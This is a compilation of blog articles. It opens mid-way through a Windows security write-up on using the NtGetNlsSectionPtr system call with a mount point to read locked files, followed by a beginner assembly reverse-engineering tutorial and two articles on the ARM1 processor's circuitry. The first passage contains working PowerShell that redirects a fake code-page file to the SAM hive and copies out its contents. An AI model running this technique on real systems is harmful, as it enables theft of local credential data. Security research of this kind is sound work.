   InitializeObjectAttributes(&obj_attr,

                              &file_name,
                              OBJ_KERNEL_HANDLE |

                              OBJ_CASE_INSENSITIVE);
   ZwOpenFile(&file_handle, SYNCHRONIZE,

              &obj_attr, FILE_SHARE_READ, 0);
   ZwCreateSection(&section_handle, FILE_MAP_READ,

                   &section_obj_attr, NULL,

                   PROTECT_READ_ONLY, MEM_COMMIT, file_handle);
   ZwClose(file_handle);
 }

 // Map section into memory and return pointer.
 NTSTATUS status = MmMapViewOfSection(

                     section_handle,
                     SectionPointer,
                     SectionSize);
 ZwClose(section_handle);
 return status;
}

 

The first thing to note here is it tries to open a named section object under the \NLS directory using a name generated from the CodePage parameter. To get an idea what that name looks like we’ll just list that directory:


The named sections are of the form NlsSectionCP<NUM> where NUM is the number of the code page to map. You’ll also notice there’s a section for a normalization data set. Which file gets mapped depends on the first NlsType parameter, we don’t care about normalization for the moment. If the section object isn’t found the code builds a file path to the code page file, opens it with ZwOpenFile and then calls ZwCreateSection to create a read-only named section object. Finally the section is mapped into memory and returned to the caller.

 

There’s two important things to note here, first the OBJ_FORCE_ACCESS_CHECK flag is not being set for the open call. This means the call will open any file even if the caller doesn’t have access to it. And most importantly the final parameter of ZwOpenFile is 0, this means neither FILE_DIRECTORY_FILE or FILE_NON_DIRECTORY_FILE is being set. Not setting these flags will result in our desired condition, the open call will follow the mount point redirection to a file and not generate an error. What is the file path set to? We can just disassemble RtlpInitNlsFileName to find out:

 

void RtlpInitNlsFileName(DWORD NlsType,

                        DWORD CodePage,

                        PUNICODE_STRING String) {
 if (NlsType == NLS_CODEPAGE) {
    RtlStringCchPrintfW(String,

             L»\\SystemRoot\\System32\\c_%.3d.nls», CodePage);
 } else {
    // Get normalization path from registry.
    // NOTE about how this is arbitrary registry write to file.
 }
}

 

The file is of the form c_<NUM>.nls under the System32 directory. Note that it uses the special symbolic link \SystemRoot which points to the Windows directory using a device path format. This prevents this code from being abused by redirecting drive letters and making it an actual vulnerability. Also note that if the normalization path is requested the information is read out from a machine registry key, so if you have an arbitrary registry value writing vulnerability you might be able to exploit this system call to get another arbitrary read, but that’s for the interested reader to investigate.

 

I think it’s clear now what we have to do, create a directory in System32 with the name c_<NUM>.nls, set its reparse data to point to an arbitrary file then use the NLS system call to open and map the file. Choosing a code page number is easy, 1337 is unused. But what file should we read? A common file to read is the SAM registry hive which contains logon information for local users. However access to the SAM file is usually blocked as it’s not sharable and even just opening for read access as an administrator will fail with a sharing violation. There’s of course a number of ways you can get around this, you can use the registry backup functions (but that needs admin rights) or we can pull an old copy of the SAM from a Volume Shadow Copy (which isn’t on by default on Windows 10). So perhaps let’s forget about… no wait we’re in luck.

 

File sharing on Windows files depends on the access being requested. For example if the caller requests Read access but the file is not shared for read access then it fails. However it’s possible to open a file for certain non-content rights, such as reading the security descriptor or synchronizing on the file object, rights which are not considered when checking the existing file sharing settings. If you look back at the code for NtGetNlsSectionPtr you’ll notice the only access right being requested for the file is SYNCHRONIZE and so will always allow the file to be opened even if locked with no sharing access.

 

But how can that work? Doesn’t ZwCreateSection need a readable file handle to do the read-only file mapping. Yes and no. Windows file objects do not really care whether a file is readable or writable. Access rights are associated with the handle created when the file is opened. When you call ZwCreateSection from user-mode the call eventually tries to convert the handle to a pointer to the file object. For that to occur the caller must specify what access rights need to be on the handle for it to succeed, for a read-only mapping the kernel requests the handle has Read Data access. However just as with access checking with files if the kernel calls ZwCreateSection access checking is disabled including when converting a file handle to the file object pointer. This results in ZwCreateSection succeeding even though the file handle only has SYNCHRONIZE access. Which means we can open any file on the system regardless of it’s sharing mode and that includes the SAM file.

 

So let’s put the final touches to this, we create the directory \SystemRoot\System32\c_1337.nls and convert it to a mount point which redirects to \SystemRoot\System32\config\SAM. Then we call NtGetNlsSectionPtr requesting code page 1337, which creates the section and returns us a pointer to it. Finally we just copy out the mapped file memory into a new file and we’re done.

 

$dir = «\SystemRoot\system32\c_1337.nls»
New-Directory $dir
 
$target_path = «\SystemRoot\system32\config\SAM»
Use-NtObject($file = Get-NtFile $dir `

            —Options OpenReparsePoint,DirectoryFile) {
 $file.SetMountPoint($target_path, $target_path)
}

Use-NtObject($map =

    [NtApiDotNet.NtLocale]::GetNlsSectionPtr(«CodePage», 1337)) {
 Use-NtObject($output = [IO.File]::OpenWrite(«sam.bin»)) {
   $map.GetStream().CopyTo($output)
   Write-Host «Copied file»
 }
}

 

Loading the created file in a hex editor shows we did indeed steal the SAM file.


For completeness we’ll clean up our mess. We can just delete the directory by opening the directory file with the Delete On Close flag and then closing the file (making sure to open it as a reparse point otherwise you’ll try and open the SAM again). For the section as the object was created in our security context (just like the directory) and there was no explicit security descriptor then we can open it for DELETE access and call ZwMakeTemporaryObject to remove the permanent reference count set by the original creator with the OBJ_PERMANENT flag.

 

Use-NtObject($sect = Get-NtSection \nls\NlsSectionCP1337 `
                   Access Delete) {
 # Delete permanent object.
 $sect.MakeTemporary()
}

What I’ve described in this blog post is not a vulnerability, although certainly the code doesn’t seem to follow best practice. It’s a system call which hasn’t changed since at least Windows 7 so if you find yourself with an arbitrary directory creation vulnerability you should be able to use this trick to read any file on the system regardless of whether it’s already open or shared. I’ve put the final script on GITHUB at this link if you want the final version to get a better understanding of how it works.

 

It’s worth keeping a log of any unusual behaviours when you’re reverse engineering a product in case it becomes useful as I did in this case. Many times I’ve found code which isn’t itself a vulnerability but have has some useful properties which allow you to build out exploitation chains.

Reverse Engineering Basic Programming Concepts

Reverse Engineering

Throughout the reverse engineering learning process I have found myself wanting a straightforward guide for what to look for when browsing through assembly code. While I’m a big believer in reading source code and manuals for information, I fully understand the desire to have concise, easy to comprehend, information all in one place. This “BOLO: Reverse Engineering” series is exactly that! Throughout this article series I will be showing you things to BOn the Look Out for when reverse engineering code. Ideally, this article series will make it easier for beginner reverse engineers to get a grasp on many different concepts!

Preface

Throughout this article you will see screenshots of C++ code and assembly code along with some explanation as to what you’re seeing and why things look the way they look. Furthermore, This article series will not cover the basics of assembly, it will only present patterns and decompiled code so that you can get a general understanding of what to look for / how to interpret assembly code.

Throughout this article we will cover:

  1. Variable Initiation
  2. Basic Output
  3. Mathematical Operations
  4. Functions
  5. Loops (For loop / While loop)
  6. Conditional Statements (IF Statement / Switch Statement)
  7. User Input

please note: This tutorial was made with visual C++ in Microsoft Visual Studio 2015 (I know, outdated version). Some of the assembly code (i.e. user input with cin) will reflect that. Furthermore, I am using IDA Pro as my disassembler.


Variable Initiation

Variables are extremely important when programming, here we can see a few important variables:

  1. a string
  2. an int
  3. a boolean
  4. a char
  5. a double
  6. a float
  7. a char array
Basic Variables

Please note: In C++, ‘string’ is not a primitive variable but I thought it important to show you anyway.

Now, lets take a look at the assembly:

Initiating Variables

Here we can see how IDA represents space allocation for variables. As you can see, we’re allocating space for each variable before we actually initialize them.

Initializing Variables

Once space is allocated, we move the values that we want to set each variable to into the space we allocated for said variable. Although the majority of the variables are initialized here, below you will see the C++ string initiation.

C++ String Initiation

As you can see, initiating a string requires a call to a built in function for initiation.

Basic Output

preface info: Throughout this section I will be talking about items pushed onto the stack and used as parameters for the printf function. The concept of function parameters will be explained in better detail later in this article.

Although this tutorial was built in visual C++, I opted to use printf rather than cout for output.

Basic Output

Now, let’s take a look at the assembly:

First, the string literal:

String Literal Output

As you can see, the string literal is pushed onto the stack to be called as a parameter for the printf function.

Now, let’s take a look at one of the variable outputs:

Variable Output

As you can see, first the intvar variable is moved into the EAX register, which is then pushed onto the stack along with the “%i” string literal used to indicate integer output. These variables are then taken from the stack and used as parameters when calling the printf function.

Mathematical Functions

In this section, we’ll be going over the following mathematical functions:

  1. Addition
  2. Subtraction
  3. Multiplication
  4. Division
  5. Bitwise AND
  6. Bitwise OR
  7. Bitwise XOR
  8. Bitwise NOT
  9. Bitwise Right-Shift
  10. Bitwise Left-Shift
Mathematical Functions Code

Let’s break each function down into assembly:

First, we set A to hex 0A, which represents decimal 10, and to hex 0F, which represents decimal 15.

Variable Setting

We add by using the ‘add’ opcode:

Addition

We subtract using the ‘sub’ opcode:

Subtraction

We multiply using the ‘imul’ opcode:

Multiplication

We divide using the ‘idiv’ opcode. In this case, we also use the ‘cdq’ to double the size of EAX so that we can fit the output of the division operation.

Division

We perform the Bitwise AND using the ‘and’ opcode:

Bitwise AND

We perform the Bitwise OR using the ‘or’ opcode:

Bitwise OR

We perform the Bitwise XOR using the ‘xor’ opcode:

Bitwise XOR

We perform the Bitwise NOT using the ‘not’ opcode:

Bitwise NOT

We peform the Bitwise Right-Shift using the ‘sar’ opcode:

Bitwise Right-Shift

We perform the Bitwise Left-Shift using the ‘shl’ opcode:

Bitwise Left-Shift

Function Calls

In this section, we’ll be looking at 3 different types of functions:

  1. a basic void function
  2. a function that returns an integer
  3. a function that takes in parameters

Calling Functions

First, let’s take a look at calling newfunc() and newfuncret() because neither of those actually take in any parameters.

Calling Functions Without Parameters

If we follow the call to the newfunc() function, we can see that all it really does is print out “Hello! I’m a new function!”:

The newfunc() Function Code
The newfunc() Function

As you can see, this function does use the retn opcode but only to return back to the previous location (so that the program can continue after the function completes.) Now, let’s take a look at the newfuncret() function which generates a random integer using the C++ rand() function and then returns said integer.

The newfuncret() Function Code
The newfuncret() function

First, space is allocated for the A variable. Then, the rand() function is called, which returns a value into the EAX register. Next, the EAX variable is moved into the A variable space, effectively setting A to the result of rand(). Finally, the A variable is moved into EAX so that the function can use it as a return value.

Now that we have an understanding of how to call function and what it looks like when a function returns something, let’s talk about calling functions with parameters:

First, let’s take another look at the call statement:

Calling a Function with Parameters in C++
Calling a Function with Parameters

Although strings in C++ require a call to a basic_string function, the concept of calling a function with parameters is the same regardless of data type. First ,you move the variable into a register, then you push the registers on the stack, then you call the function.

Let’s take a look at the function’s code:

The funcparams() Function Code
The funcparams() Function

All this function does is take in a string, an integer, and a character and print them out using printf. As you can see, first the 3 variables are allocated at the top of the function, then these variables are pushed onto the stack as parameters for the printf function. Easy Peasy.

Loops

Now that we have function calling, output, variables, and math down, let’s move on to flow control. First, we’ll start with a for loop:

For Loop Code
A graphical Overview of the For Loop

Before we break down the assembly code into smaller sections, let’s take a look at the general layout. As you can see, when the for loop starts, it has 2 options; It can either go to the box on the right (green arrow) and return, or it can go to the box on the left (red arrow) and loop back to the start of the for loop.

Detailed For Loop

First, we check if we’ve hit the maximum value by comparing the i variable to the max variable. If the i variable is not greater than or equal to the maxvariable, we continue down to the left and print out the i variable then add 1 to i and continue back to the start of the loop. If the i variable is, in fact, greater than or equal to max, we simply exit the for loop and return.

Now, let’s take a look at a while loop:

While Loop Code
While Loop

In this loop, all we’re doing is generating a random number between 0 and 20. If the number is greater than 10, we exit the loop and print “I’m out!” otherwise, we continue to loop.

In the assembly, the A variable is generated and set to 0 originally, then we initialize the loop by comparing A to the hex number 0A which represents decimal 10. If A is not greater than or equal to 10, we generate a new random number which is then set to A and we continue back to the comparison. If A is greater than or equal to 10, we break out of the loop, print out “I’m out” and then return.

If Statements

Next, we’ll be talking about if statements. First, let’s take a look at the code:

IF Statement Code

This function generates a random number between 0 and 20 and stores said number in the variable A. If A is greater than 15, the program will print out “greater than 15”. If A is less than 15 but greater than 10, the program will print out “less than 15, greater than 10”. This pattern will continue until A is less than 5, in which case the program will print out “less than 5”.

Now, let’s take a look at the assembly graph:

IF Statement Assembly Graph

As you can see, the assembly is structured similarly to the actual code. This is because IF statements are simply “If X Then Y Else Z”. IF we look at the first set of arrows coming out of the top section, we can see a comparison between the A variable and hex 0F, which represents decimal 15. If A is greater than or equal to 15, the program will print out “greater than 15” and then return. Otherwise, the program will compare A to hex 0A which represents decimal 10. This pattern will continue until the program prints and returns.

Switch Statements

Switch statements are a lot like IF statements except in a Switch statement one variable or statement is compared to a number of ‘cases’ (or possible equivalences). Let’s take a look at our code:

Switch Statement Code

In this function, we set the variable A to equal a random number between 0 and 10. Then, we compare A to a number of cases using a Switch statement. IfA is equal to any of the possible cases, the case number will be printed, and then the program will break out of the Switch statement and the function will return.

Now, let’s take a look at the assembly graph:

Switch Case Assembly Graph

Unlike IF statements, switch statements do not follow the “If X Then Y Else Z” rule, instead, the program simply compares the conditional statement to the cases and only executes a case if said case is the conditional statement’s equivalent. Le’ts first take a look at the initial 2 boxes:

The First 2 Graph Sections

First, the program generates a random number and sets it to A. Then, the program initializes the switch statement by first setting a temporary variable (var_D0) to equal A, then ensuring that var_D0 meets at least one of the possible cases. If var_D0 needs to default, the program follows the green arrow down to the final return section (see below). Otherwise, the program initiates a switch jump to the equivalent case’s section:

In the case that var_D0 (A) is equal to 5, the code will jump to the above case section, print out “5” and then jump to the return section.

User Input

In this section, we’ll cover user input using the C++ cin function. First, let’s look at the code:

User Input Code

In this function, we simply take in a string to the variable sentence using the C++ cin function and then we print out sentence through a printf statement.

Le’ts break this down into assembly. First, the C++ cin part:

C++ cin

This code simply initializes the string sentence then calls the cin function and sets the input to the sentence variable. Let’s take a look at the cin call a bit closer:

The C++ cin Function Upclose

First, the program sets the contents of the sentence variable to EAX, then pushes EAX onto the stack to be used as a parameter for the cin function which is then called and has it’s output moved into ECX, which is then put on the stack for the printf statement:

User Input printf Statement

Thanks!

Conditional instructions in the ARM1 processor, reverse engineered

By carefully examining the layout of the ARM1 processor, it can be reverse engineered. This article describes the interesting circuit used for conditional instructions: this circuit is marked in red on the die photo below. Unlike most processors, the ARM executes every instruction conditionally. Each instruction specifies a condition and is only executed if the condition is satisfied. For every instruction, the condition circuit reads the condition from the instruction register (blue), evaluates the condition flags (purple), and informs the control logic (yellow) if the instruction should be executed or skipped.

The ARM1 processor chip showing the condition evaluation circuit (red) and the main components it interacts with. Original photo courtesy of Computer History Museum.

The ARM1 processor chip showing the condition evaluation circuit (red) and the main components it interacts with. Original photo courtesy of Computer History Museum.

Why care about the ARM1 chip? It is the highly-influential ancestor of the extremely popular ARM processor. The ARM1 processor got off to a slow start in 1985 but now ARM processors are now sold by the tens of billions; your smart phone probably runs on ARM. This article is part of my series on reverse engineering the ARM1; start with my first article for an overview of the chip.

What are conditional instructions?

A key part of any computer is the ability of a program to change what it is doing based on various conditions. Most computers provide conditional branch instructions, which cause execution to jump to a different part of the program based on various condition flags. For example, consider the code if (x == 0) { do_something }. Compiled to assembly code, this first tests the value of variable x and sets the Zero flag if x is 0. Next, a conditional branch instruction jump over the do_something code if the Zero flag is not set.

The ARM processor takes conditionals much further than other processors: every instruction becomes a conditional instruction. Every instruction includes one of 16 conditions and the instruction is only executed if the condition is true; otherwise the instruction is skipped. (This is also known as predication.) The motivation is to avoid inefficient jumping around in the code.

The ARM manual excerpt below shows how four bits in each 32-bit instruction specify one of 16 conditions. Most of the conditions are straightforward, checking if values are equal, negative, higher, and so forth. Most instructions will use the «always» condition, which simply means the instruction always executes. The opposite «never» condition is not highly useful — an instruction with that condition never executes — but it can be used for a NOP, patching code, or adjusting timing of an instruction sequence.

Every instruction in the ARM processor has one of 16 conditions specified. The instruction is executed only if the condition is satisfied.

Every instruction in the ARM processor has one of 16 conditions specified. The instruction is executed only if the condition is satisfied.

Studying the different conditions reveals much of how the condition circuit works. It is based on four condition flags. The zero (Z) flag is set if a value is zero. The negative (N) flag is set if a value is negative. The carry (C) flag is set if there is a carry or borrow from addition or subtraction. The overflow (V) flag is set if there is an overflow during signed arithmetic (details).

The top three bits of the instruction select one of eight conditions, as highlighted in yellow. The fourth bit selects the condition or its opposite (blue). If the fourth bit is 0, the condition must be true; if the fourth bit is 1, the condition must be false.

Implementation of the circuit

The implementation of the conditional logic circuit matches the above description. First, the eight conditions are generated from the four flags. One of the conditions is selected based on the three instruction bits. If the fourth instruction bit is set, the condition is flipped. The result is 1 if the condition is satisfied, and 0 if the condition is not satisfied. One unexpected part of the circuit is that an undefined instruction or and interrupt causes the condition to be cleared, preventing execution of the instruction. The resulting condition signal output is connected to a control part of the chip, where it causes the instruction to be executed or not, as desired.

The condition code evaluation circuit from the ARM1 processor.

The condition code evaluation circuit from the ARM1 processor.

The diagram above shows the condition code circuit of the chip as it appears in the simulator; this is a zoomed-in version of the red rectangle indicated on the die earlier. The chip consists of multiple layers, indicated by different colors. Transistors appear as red or blue regions. NMOS transistors are red; they turn on with a 1 input and can pull their output low. PMOS transistors (blue) are complementary; they turn on with a 0 input and can pull their output high. Physically above the transistors is the polysilicon wiring layer (green). When polysilicon crosses a transistor it forms the gate (yellow) that controls the transistor. Finally, two layers of metal wiring (gray) are above the polysilicon.

The circuit is arranged in columns. The first column of transistors forms the logic gates to generate the conditions from the flag values. The next column is the multiplexer, a circuit that takes the eight input conditions and selects one. The rightmost column contains 8 NAND gates that decode the three instruction bits into 8 control lines. Each line is fed into the multiplexer to select the corresponding condition. At the right is the wiring for the 3 instruction bits and their complements. A few miscellaneous gates are at the bottom of the multiplexer and decoder columns. These include inverters to complement the instruction bits.

The condition generation gates

The diagram below zooms in on the left third of the circuit above. This part of the circuit uses standard CMOS logic gates to computes the conditions from the flags. Each gate is built from NMOS (red) and PMOS (blue) transistors in a horizontal strip. Comparing the text description of conditions from the manual with the logic shows how the conditions are generated. For instance, the HI (unsigned higher) condition requires flags «C set and Z clear». The top three gates generate this condition. The GE (greater than or equal) condition is more complex, requiring flags «N set and V set, or N clear and V clear». The next two gates compute this value. (Due to the way CMOS gates are constructed, an OR-NAND gate is constructed as a single gate.) Likewise, the other conditions are generated. The AL (always) condition is simply a 1, and doesn’t require any circuitry. The conditions are fed into the multiplexer, which will be discussed below.

The output coming back from the multiplexer is the selected condition, labeled «cond» below. The NAND and OR-NAND gates flip the condition if instruction register bit 28 (ireg28) is set. This implements the eight opposite conditions. The result is labeled «ok», indicating the overall condition is satisfied. The final three gates block instruction execution for an interrupt or undefined instruction.

Gates in the ARM1 processor generate the various conditionals from the flag values.

Gates in the ARM1 processor generate the various conditionals from the flag values.

One thing I’d like to emphasize about the ARM1 is that its layout is very orderly and non-optimized. While it may appear chaotic, the gates are arranged by combining relatively fixed blocks («standard cells») and wiring them together. Each gate forms a strip and the gates are stacked together in columns. The polysilicon and metal layers connect the gates as necessary.

The layout of the ARM1 chip is a consequence of the VLSI Technology chip design software used to create it. The resulting layout is simple, but doesn’t use space very efficiently. Since the ARM1 uses very few transistors for its time, the designers weren’t worried about optimizing the layout. In contrast, earlier chips such as the Z-80 were hand-drawn, with each transistor and wire carefully shaped to use the minimum space possible. The diagram below shows a small part of the Z-80 processor layout, showing the extremely irregular but dense arrangement of the chip. The transistors are not arranged in rows as in the ARM1 above, but fit together to use all the available space.

A detail of the Z-80 processor layout, showing the complex hand-drawn layout. Each transistor and wire is carefully shaped to minimize the chip's size.

A detail of the Z-80 processor layout, showing the complex hand-drawn layout. Each transistor and wire is carefully shaped to minimize the chip’s size.

The multiplexer and decoders

Selecting the desired condition out of the eight possibilities is the job of a circuit called the multiplexer. The multiplexer takes 8 inputs (the conditions) and 8 control signals (based on the instruction) and selects the desired condition. To the right of the multiplexer, 8 NAND gates generate the 8 control signals by decoding the three instruction bits. Each gate simply looks at three bit values and outputs a 0 if the bits select that condition. For instance, if the first two bits are 0 and the third is 1, the gate for condition 1 outputs a 0, selecting that condition in the multiplexer. The animation below shows the circuit as the instruction bits cycle through the eight conditions. You can see the activated condition moving downwards through the circuit.

Animation of the multiplexer in the ARM1 condition code evaluation circuit.

Animation of the multiplexer in the ARM1 condition code evaluation circuit.

While a multiplexer can be built from standard logic gates, the ARM1 multiplexer is built from a different type of circuitry called transmission gates (which the ARM1 also uses in its bit counter). A multiplexer built from transmission gates is more compact and faster than one built from standard logic (NAND gates). One feature of CMOS is that by combining an NMOS transistor and a PMOS transistor in parallel, a transmission gate switch can be built. Feeding 1 into the NMOS gate and 0 into the PMOS gate turns on both transistors and they pass their input through. With the opposite gate values, both transistors turn off and the switch opens. The multiplexer is built from 8 of these CMOS switches. Each condition input feeds into one switch, and the switch outputs are connected together. One switch is turned on at a time, selecting the corresponding input as the output value.

The diagram below shows the schematic of the multiplexer as well as its physical layout on the chip. Only the first three segments of the eight are shown; the remainder are similar. Each input is connected to two transistors forming a CMOS switch. Because the NMOS and PMOS gates require opposite signals, the multiplexer has an inverter for each control signal. Each inverter also consists of two transistors, but wired differently from the switch.

Schematic of the multiplexer inside the ARM1 processor's condition code evaluation circuit.Diagram of the multiplexer inside the ARM1 processor's condition code evaluation circuit.

Schematic and diagram of the multiplexer inside the ARM1 processor’s condition code evaluation circuit.

Working together the decode circuit, inverters, and CMOS switches form the multiplexer that selects the desired condition from the eight choices. The logic described earlier allows this condition to be flipped, for a total of 16 possible conditions.

Conclusion

One unusual feature of the ARM instruction set is that every instruction has a condition associated with it and is only executed if the condition is true. The ARM1 chip is simple enough that the condition circuitry on the chip can be examined and understood at the transistor and gate level. Now that you’ve seen the internals of the condition logic, you can use the Visual ARM1 simulator to see the circuit in action. While the ARM1 may seem like a historical artifact of the 1980s, ARM processors power most smartphones, so there’s probably a similar circuit controlling your phone right now.

Reverse engineering the ARM1, ancestor of the iPhone’s processor

Almost every smartphone uses a processor based on the ARM1 chip created in 1985. The Visual ARM1 simulator shows what happens inside the ARM1 chip as it runs; the result (below) is fascinating but mysterious.[1] In this article, I reverse engineer key parts of the chip and explain how they work, bridging the gap between the puzzling flashing lines in the simulator and what the chip is actually doing. I describethe overall structure of the chip and then descend to the individual transistors, showing how they are built out of silicon and work together to store and process data. After reading this article, you can look at the chip’s circuits and understand the data they store.

Simulation of the ARM1 processor chip.

Screenshot of the Visual ARM1 simulator, showing the activity inside the ARM1 chip as it executes a program.

Overview of the ARM1 chip

The ARM1 chip is built from functional blocks, each with a different purpose. Registers store data, the ALU (arithmetic-logic unit) performs simple arithmetic, instruction decoders determine how to handle each instruction, and so forth. Compared to most processors, the layout of the chip is simple, with each functional block clearly visible. (In comparison, the layout of chips such as the 6502 or Z-80 is highly hand-optimized to avoid any wasted space. In these chips, the functional blocks are squished together, making it harder to pick out the pieces.)

The diagram below shows the most important functional blocks of the ARM chip.[2] The actual processing happens in the bottom half of the chip, which implements the data path. The chip operates on 32 bits at a time so it is structured as 32 horizontal layers: bit 31 at the top, down to bit 0 at the bottom. Several data buses run horizontally to connect different sections of the chip. The large register file, with 25 registers, stands out in the image. The Program Counter (register 15) is on the left of the register file and register 0 is on the right.[3]

The main components of the ARM1 chip. Most of the pins are used for address and data lines; unlabeled pins are various control signals.

The main components of the ARM1 chip. Most of the pins are used for address and data lines; unlabeled pins are various control signals.

Computation takes place in the ALU (arithmetic-logic unit), which is to the right of the registers. The ALU performs 16 different operations (add, add with carry, subtract, logical AND, logical OR, etc.) It takes two 32-bit inputs and produces a 32-bit output. The ALU is described in detail here.[4] To the right of the ALU is the 32-bit barrel shifter. This large component performs a binary shift or rotate operation on its input, and is described in more detail below. At the left is the address circuitry which provides an address to memory through the address pins. At the right data circuitry reads and writes data values to memory.

Above the datapath circuitry is the control circuitry. The control lines run vertically from the control section to the data path circuits below. These signals select registers, tell the ALU what operation to perform, and so forth. The instruction decode circuitry processes each instruction and generates the necessary control signals. The register decode block processes the register select bits in an instruction and generates the control signals to select the desired registers.[5]

The pins

The squares around the outside of the image above are the pads that connect the processor to the outside world. The photo below shows the 84-pin package for the ARM1 processor chip. The gold-plated pins are wired to the pads on the silicon chip inside the package.

The ARM1 processor chip installed in the Acorn ARM Evaluation System. Original photo by Flibble, https://commons.wikimedia.org/wiki/File:Acorn-ARM-Evaluation-System.jpg, CC BY-SA 3.0.

The ARM1 processor chip installed in the Acorn ARM Evaluation System. Full photo by Flibble, CC BY-SA 3.0.

Most of the pads are used for the address and data lines to memory. The chip has 26 address lines, allowing it to access 64MB of memory, and has 32 data lines, allowing it to read or write 32 bits at a time. The address lines are in the lower left and the data lines are in the lower right. As the simulator runs, you can see the address pins step through memory and the data pins read data from memory. The right hand side of the simulator shows the address and data values in hex, e.g. «A:00000020 D:e1a00271». If you know hex, you can easily match these values to the pin states.

Each corner of the chip has a power pin (+) and a ground pin (-), providing 5 volts to run the chip. Various control signals are at the top of the chip. In the simulator, it is easy to spot the the two clock signals that step the chip through its operations (below). The phase 1 and phase 2 clocks alternate, providing a tick-tock rhythm to the chip. In the simulator, the clock runs at a couple cycles per second, while the real chip has a 8MHz clock, more than a million times faster. Finally, note below the manufacturer’s name «ACORN» on the chip in place of pin 82.

The two clock signals for the ARM1 processor chip.

History of the ARM chip

The ARM1 was designed in 1985 by engineers Sophie Wilson (formerly Roger Wilson) and Steve Furber of Acorn Computers. The chip was originally named the Acorn RISC Machine and intended as a coprocessor for the BBC Micro home/educational computer to improve its performance. Only a few hundred ARM1 processors were fabricated, so you might expect ARM to be a forgotten microprocessor, a historical footnote of the 1980s. However, the original ARM1 chip led to the amazingly successful ARM architecture with more than 50 billion ARM chips produced. What happened?

In the early 1980s, academic research suggested that instead of making processor instruction sets more complex, designers would get better performance from a processor that was simple but fast: the Reduced Instruction Set Computer or RISC.[6] The Berkeley and Stanford research papers on RISC inspired the ARM designers to choose a RISC design. In addition, given the small size of the design team at Acorn, a simple RISC chip was a practical choice.[7]

The simplicity of a RISC design is clear when comparing the ARM1 and Intel’s 80386, which came out the same year: the ARM1 had about 25,000 transistors versus 275,000 in the 386.[8] The photos below show the two chips at the same scale; the ARM1 is 50mm2 compared to 104mm2 for the 386. (Twenty years later, an ARM7TDMI core was 0.1mm2; magnified at the same scale it would be the size of this square  vividly illustrating Moore’s law.)

Die photo of the ARM1 processor chip. Courtesy of Computer History Museum. Intel 386 CPU die photo (A80386DX-20). By Pdesousa359, https://commons.wikimedia.org/wiki/File:Intel_A80386DX-20_CPU_Die_Image.jpg (CC BY-SA 3.0)

Die photos of the ARM1 processor and the Intel 386 processor to the same scale. The ARM1 is much smaller and contained 25,000 transistors compared to 275,000 in the 386. The 386 was higher density, with a 1.5 micron process compared to 3 micron for the ARM1. ARM1 photo courtesy of Computer History Museum. Intel A80386DX-20 by Pdesousa359CC BY-SA 3.0.

Because of the ARM1’s small transistor count, the chip used very little power: about 1/10 Watt, compared to nearly 2 Watts for the 386. The combination of high performance and low power consumption made later versions of ARM chip very popular for embedded systems. Apple chose the ARM processor for its ill-fated Newton handheld system and in 1990, Acorn Computers, Apple, and chip manufacturer VLSI Technology formed the company Advanced RISC Machines to continue ARM development.[9]

In the years since then, ARM has become the world’s most-used instruction set with more than 50 billion ARM processors manufactured. The majority of mobile devices use an ARM processor; for instance, the Apple A8 processor inside iPhone 6 uses the 64-bit ARMv8-A. Despite its humble beginnings, the ARM1 made IEEE Spectrum’s list of 25 microchips that shook the world and PC World’s 11 most influential microprocessors of all time.

Looking at the low-level construction of the ARM1 chip

Getting back to the chip itself, the ARM1 chip is constructed from five layers. If you zoom in on the chip in the simulator, you can see the components of the chip, built from these layers. As seen below, the simulator uses a different color for each layer, and highlights circuits that are turned on. The bottom layer is the silicon that makes up the transistors of the chip. During manufacturing, regions of the silicon are modified (doped) by applying different impurities. Silicon can be doped positive to form a PMOS transistor (blue) or doped negative for an NMOS transistor (red). Undoped silicon is basically an insulator (black).

The ARM1 simulator uses different colors to represent the different layers of the chip.

The ARM1 simulator uses different colors to represent the different layers of the chip.

Polysilicon wires (green) are deposited on top of the silicon. When polysilicon crosses doped silicon, it forms the gate of a transistor (yellow). Finally, two layers of metal (gray) are on top of the polysilicon and provide wiring.[10] Black squares are contacts that form connections between the different layers.

For our purposes, a MOS transistor can be thought of as a switch, controlled by the gate. When it is on (closed), the source and drain silicon regions are connected. When it is off (open), the source and drain are disconnected. The diagram below shows the three-dimensional structure of a MOS transistor.

Structure of a MOS transistor.

Structure of a MOS transistor.

Like most modern processors, the ARM1 was built using CMOS technology, which uses two types of transistors: NMOS and PMOS. NMOS transistors turn on when the gate is high, and pull their output towards ground. PMOS transistors turn on when the gate is low, and pull their output towards +5 volts.

Understanding the register file

The register file is a key component of the ARM1, storing information inside the chip. (As a RISC chip, the ARM1 makes heavy use of its registers.) The register file consists of 25 registers, each holding 32 bits. This section describes step-by-step how the register file is built out of individual transistors.

The diagram below shows two transistors forming an inverter. If the input is high (as below), the NMOS transistor (red) turns on, connecting ground to the output so the output is low. If the input is low, the PMOS transistor (blue) turns on, connecting power to the output so the output is high. Thus, the output is the opposite of the input, making an inverter.

An inverter in the ARM1 chip, as displayed by the simulator.

An inverter in the ARM1 chip, as displayed by the simulator.

Combining two inverters into a loop forms a simple storage circuit. If the first inverter outputs 1, the second inverter outputs 0, causing the first inverter to output 1, and the circuit is stable. Likewise, if the first inverter outputs 0, the second outputs 1, and the circuit is again stable. Thus, the circuit will remain in either state indefinitely, «remembering» one bit until forced into a different state.

Two inverters in the ARM1 chip form one bit of register storage.

Two inverters in the ARM1 chip form one bit of register storage.

To make this circuit into a useful register cell, read and write bus lines are added, along with select lines to connect the cell to the bus lines. When the write select line is activated, the pass connector connects the write bus to the inverter, allowing a new value to be overwrite the current bit. Likewise, pass transistors connect the bit to a read bus when activated by the corresponding select line, allowing the stored value to be read out.

Schematic of one bit in the ARM1 processor's register file.

Schematic of one bit in the ARM1 processor’s register file.

To create the register file, the register cell above is repeated 32 times vertically for each bit, and 25 times horizontally to form each register. Each bit has three horizontal bus lines — the write bus and the two read buses — so there are 32 triples of bus lines. Each register has three vertical control lines — the write select line and two read select lines — so there are 25 triples of control lines. By activating the desired control lines, two registers can be read and one register can be written at a time.[11] When the simulator is running, you can see the vertical control lines activated to select registers, and you can see the data bits flowing on the horizontal bus lines.

By looking at a memory cell in the simulator, you can see which inverter is on and determine if the bit is a 0 or a 1. The diagram below shows a few register bits. If the upper inverter input is active, the bit is 0; if the lower inverter input is active, the bit is 1. (Look at the green lines above or below the bit values.) Thus, you can read register values right out of the simulator if you look closely.

By looking at the ARM1 register file, you can determine the value of each bit. For a 0 bit, the input to the top inverter is active (green/yellow); for a 1 bit, the input to the bottom inverter is active.

